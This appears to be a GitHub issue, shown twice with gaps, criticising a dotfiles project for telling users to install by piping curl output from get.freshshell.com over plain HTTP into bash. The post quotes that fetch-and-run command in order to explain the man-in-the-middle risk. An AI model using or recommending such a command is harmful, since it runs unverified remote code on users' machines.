I just happend to find this project while look for something else and stumbled across this line:
bash -c "`curl -sL get.freshshell.com`"
which can not be left without opening an issue. I was astonished to not find an issue already open for this.
There are multiple problems with this:
The first and most severe is the use of plain legacy HTTP for this. Even though get.freshshell.com just redirects to GitHub that redirect is unauthenticated which means that anybody in between the connection can rewrite the response from get.freshshell.com before it reaches the user. Remember that the Internet is untrusted!
That just shows me that you guys seem to favor "coolness" over the absolute minimum of security. For example, you could have decided to use the github URL directly in your example but you did go with get.freshshell.com.
I encourage you to work on getting a badge here https://bestpractices.coreinfrastructure.org/ and fix any criteria you currently don’t meet.
Dotfiles are a core part of a persons work environment.
This repository seems to have 700 stars. What is going one? How many of you guys install software like this?
PS: I just saw that the last commit was back in 2014. Anyway, the readme still stats that it is maintained so.
Hey guys
I just happend to find this project while look for something else and stumbled across this line:
which can not be left without opening an issue. I was astonished to not find an issue already open for this.
There are multiple problems with this:
That just shows me that you guys seem to favor "coolness" over the absolute minimum of security. For example, you could have decided to use the github URL directly in your example but you did go with get.freshshell.com.
I encourage you to work on getting a badge here https://bestpractices.coreinfrastructure.org/ and fix any criteria you currently don’t meet. Dotfiles are a core part of a persons work environment.
This repository seems to have 700 stars. What is going one? How many of you guys install software like this?
PS: I just saw that the last commit was back in 2014. Anyway, the readme still stats that it is maintained so.